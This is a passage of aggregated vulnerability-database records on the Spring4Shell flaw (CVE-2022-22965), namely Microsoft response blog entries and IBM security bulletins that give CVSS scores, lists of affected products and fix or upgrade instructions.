"cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T07:00:00", "id": "MSRC:68FA6D02FA64FF61F41A7B1A8E364197", "href": "/blog/2022/04/microsofts-response-to-cve-2022-22965-spring-framework/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-08T19:45:16", "description": "Summary Microsoft used the Spring Framework RCE, Early Announcement to inform analysis of the remote code execution vulnerability, CVE-2022-22965, disclosed on 31 Mar 2022. We have not to date noted any impact to the security of our enterprise services and have not experienced any degraded service availability due to this vulnerability. Threat analysis of the \u2026\n\n[ Microsoft\u2019s Response to CVE-2022-22965 Spring Framework Read More \u00bb](<https://msrc-blog.microsoft.com/2022/04/05/microsofts-response-to-cve-2022-22965-spring-framework/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T23:41:01", "type": "msrc", "title": "Microsoft\u2019s Response to CVE-2022-22965 Spring Framework", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T23:41:01", "id": "MSRC:A49EE2D875C0E490BD326B3CDDB7399F", "href": "https://msrc-blog.microsoft.com/2022/04/05/microsofts-response-to-cve-2022-22965-spring-framework/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:26:47", "description": "\u672c\u30d6\u30ed\u30b0\u306f\u3001Microsoft\u2019s Response to CVE-2022-22965 Spring Framework \u306e\u6284\u8a33\u7248\u3067\u3059\u3002\u6700\u65b0\u306e\u60c5\u5831\u306f\u539f\u6587\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044\u3002 \u6982\u8981 \u6982", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T07:00:00", "type": "msrc", "title": "CVE-2022-22965 Spring Framework \u306b\u5bfe\u3059\u308b\u30de\u30a4\u30af\u30ed\u30bd\u30d5\u30c8\u306e\u5bfe\u5fdc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T07:00:00", "id": "MSRC:4016FF02733260CBC5200B5091666FD4", "href": "/blog/2022/04/microsofts-response-to-cve-2022-22965-spring-framework-jp/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ibm": [{"lastseen": "2023-12-03T18:32:53", "description": "## Summary\n\nIBM Sterling Control Center is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. The fix includes Spring Framework 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling Control Center| 6.2.1.0 \nIBM Sterling Control Center| 6.2.0.0 \n \n\n\n## Remediation/Fixes\n\n**Product**\n\n| \n\n**Version**\n\n| \n\n**iFix**\n\n| \n\n**Remediation** \n \n---|---|---|--- \n \nIBM Sterling Control Center\n\n| \n\n6.2.1.0\n\n| \n\niFix07\n\n| \n\n[Fix Central - 6.2.1.0](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Control+Center&release=6.2.1.0&platform=All&function=all>) \n \nIBM Sterling Control Center\n\n| \n\n6.2.0.0\n\n| \n\niFix17\n\n| \n\n[Fix Central - 6.2.0.0](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Control+Center&release=6.2.0.0&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-25T22:33:00", "type": "ibm", "title": "Security Bulletin: IBM Sterling Control Center is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-25T22:33:00", "id": "8EA98A1ACD7FB64C20AF5E150C5876B7A376F3920E71B4315AC3EAC3F292126E", "href": "https://www.ibm.com/support/pages/node/6589989", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:32:19", "description": "## Summary\n\nIBM Sterling Connect:Direct Web Services is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. CDWS using Spring boot to develop REST APIs. The fix includes Spring boot version-2.6.6.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling Connect Direct Web Services| 1.0 \nIBM Sterling Connect:Direct Web Services| 6.1.0 \nIBM Sterling Connect:Direct Web Services| 6.2.0 \nIBM Sterling Connect:Direct Web Services| 6.0 \n \n\n\n## Remediation/Fixes\n\n**Product(s)**| **Version(s)**| **Remediation \n** \n---|---|--- \nIBM Sterling Connect Direct Web Services| 1.0| Apply 6.0.0.8, available on [Fix Central](<https://www.ibm.com/support/fixcentral/options?selectionBean.selectedTab=find&selection=ibm%2fOther+software%3bibm%2fOther+software%2fIBM+Connect%3aDirect+Web+Services> \"\" ) \nIBM Sterling Connect:Direct Web Services| 6.0| Apply 6.0.0.8, available on [Fix Central](<https://www.ibm.com/support/fixcentral/options?selectionBean.selectedTab=find&selection=ibm%2fOther+software%3bibm%2fOther+software%2fIBM+Connect%3aDirect+Web+Services> \"\" ) \nIBM Sterling Connect:Direct Web Services| 6.1| Apply 6.1.0.12, available on [Fix Central](<https://www.ibm.com/support/fixcentral/options?selectionBean.selectedTab=find&selection=ibm%2fOther+software%3bibm%2fOther+software%2fIBM+Connect%3aDirect+Web+Services> \"\" ) \nIBM Sterling Connect:Direct Web Services| 6.2| Apply 6.2.0.6, available on [Fix Central](<https://www.ibm.com/support/fixcentral/options?selectionBean.selectedTab=find&selection=ibm%2fOther+software%3bibm%2fOther+software%2fIBM+Connect%3aDirect+Web+Services> \"\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T05:50:15", "type": "ibm", "title": "Security Bulletin: IBM Sterling Connect:Direct Web Services is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-06-07T05:50:15", "id": "D77134C81C99E57B976FD13B327D499D7859624EF6E1B9534595C21A83A1761B", "href": "https://www.ibm.com/support/pages/node/6592977", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:34:09", "description": "## Summary\n\nOperations Dashboard in Cloud Pak for Integration is affected by Spring4Shell CVE-2022-22965 with details below\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nOperations Dashboard| 2020.4.1 \n2021.1.1 \n2021.2.1 \n2021.3.1 \n2021.4.1 \n \n\n\n## Remediation/Fixes\n\n**Operations Dashboard version 2020.4.1 in IBM Cloud Pak for Integration** \nUpgrade Operations Dashboard to 2020.4.1-8-eus using the Operator upgrade process described in the IBM Documentation \n<https://www.ibm.com/docs/en/cloud-paks/cp-integration/2020.4?topic=components-upgrading-operations-dashboard> \n \n**Operations Dashboard version 2021.1.1, 2021.2.1, 2021.3.1, and 2021.4.1 in IBM Cloud Pak for Integration** \nUpgrade Operations Dashboard to 2021.4.1-4 using the Operator upgrade process described in the IBM Documentation \n<https://www.ibm.com/docs/en/cloud-paks/cp-integration/2021.4?topic=capabilities-upgrading-integration-tracing>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T14:59:37", "type": "ibm", "title": "Security Bulletin: Operations Dashboard in Cloud Pak for Integration is affected by Spring4Shell CVE-2022-22965", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-27T14:59:37", "id": "ED11CF0606100E816592CB9CC87F176EF4BB64094BA5B7978B3810737572EBA4", "href": "https://www.ibm.com/support/pages/node/6575447", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:31:54", "description": "## Summary\n\nRational Test Control Panel is affected but not vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used in the Rational Test Control Panel web application. The fix includes a patched version of the affected spring-beans-4.3.22 library\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nRational Test Control Panel component in Rational Test Virtualization Server| 9.2.1.1, 9.5, 10.0.2.1, 10.1.3, 10.2.2 \nRational Test Control Panel component in Rational Test Workbench| 9.2.1.1, 9.5, 10.0.2.1, 10.1.3, 10.2.2 \n \n* All versions prior to those shown are affected. Upgrade to the latest versions shown.\n\n \n\n\n## Remediation/Fixes\n\n 1. Verify the version of Rational Test Control Panel\n 2. Download the fix for your product from Fix Central, this can be obtained for either Rational Test Workbench or Rational Test Virtualization Server by selecting the product and relevant version before browsing for fixes. Select and download the fix pack named Rational-RTCP-<_product-name_>-<_product-version_>-CVE-2022-22965-ifix for your selected product.\n 3. Stop Rational Test Control Panel\n 4. Navigate to the existing Rational Test Control Panel installation \nThe default installation locations for these files are: \nWindows: `C:\\Program Files\\IBM\\RationalTestControlPanel\\ \n` AIX, Linux, Solaris: `/opt/IBM/RationalTestControlPanel/`\n 5. Copy the contents of the \"usr\" directory as a backup\n 6. Unzip the download fix into the `RationalTestControlPanel` directory, overwriting the existing files.\n 7. Start Rational Test Control Panel\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-16T17:10:46", "type": "ibm", "title": "Security Bulletin: Rational Test Control Panel component in Rational Test Virtualization Server and Rational Test Workbench is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-06-16T17:10:46", "id": "0465751AC2B09E6749CD032D525B17660008B7BDE693E1A430E27B2E32A33438", "href": "https://www.ibm.com/support/pages/node/6595721", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:33:05", "description": "## Summary\n\nIBM Robotic Process Automation with Automation Anywhere is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. IBM Robotic Process Automation with Automation Anywhere control room is using Spring Framework 5.1.6 with JDK 11. The fix will upgrade Spring Framework version to 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Robotic Process Automation with Automation Anywhere| 19.0 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the Spring Framework issue by upgrading to fix pack 19.0.0.10.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-19T16:14:28", "type": "ibm", "title": "Security Bulletin: IBM Robotic Process Automation with Automation Anywhere is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-19T16:14:28", "id": "D259E621EF9ECC71F1E5CA25BD5CC4DDE78CFECBB5FC21F2E4BCB16169E0B602", "href": "https://www.ibm.com/support/pages/node/6587935", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:31:53", "description": "## Summary\n\nIBM Spectrum Conductor is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. IBM Spectrum Condustor includes Spring Framework related classes in the package. It impacts the ascd, WEBGUI and HostFactory components. The fix upgrades spring framework into 5.2.20.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n_**Affected Product(s)**_| _**Version(s)**_ \n---|--- \nIBM Spectrum Conductor| 2.4.1 \nIBM Spectrum Conductor| 2.5.0 \nIBM Spectrum Conductor| 2.5.1 \n \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by upgrading the following interim fixes in the table:**\n\n_**Products**_| _**VRMF**_| _**APAR**_| _**Remediation/Fix**_ \n---|---|---|--- \nIBM Spectrum Conductor| 2.4.1| P104680| \n\n[sc-2.4.1-build601166](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.4.1-build601166&includeSupersedes=0> \"sc-2.4.1-build601166\" ) \n \nIBM Spectrum Conductor| 2.5.0| P104681| \n\n[sc-2.5-build601167](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.5-build601167&includeSupersedes=0> \"sc-2.5-build601167\" ) \n \nIBM Spectrum Conductor| 2.5.1| P104682| \n\n[sc-2.5.1-build601169](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.5.1-build601169&includeSupersedes=0> \"sc-2.5.1-build601169\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-20T02:10:14", "type": "ibm", "title": "Security Bulletin: IBM Spectrum Conductor is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-06-20T02:10:14", "id": "78AC818528F1ED5E96DF9765AA477784E752DB03E5EC0169C89AD690326E3F5F", "href": "https://www.ibm.com/support/pages/node/6596867", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:35:15", "description": "## Summary\n\nIBM Maximo For Civil infrastructure is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. The fix includes Spring Boot 2.6.6 that depends on Spring Framework 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Maximo for Civil Infrastructure| 7.6.2.1, 7.6.3, 7.6.3.1 \n \n\n\n## Remediation/Fixes\n\nDownload the correct version of the fix from the following link: [IBM Maximo for Civil Infrastructure V7.6.3.2 Fix Pack](<https://www.ibm.com/support/pages/node/6569525> \"IBM Maximo for Civil Infrastructure V7.6.3.2 Fix Pack\" ). Installation instructions for the fix are included in the readme document that is in the fix package.\n\n## Workarounds and Mitigations\n\nNone\n\n## 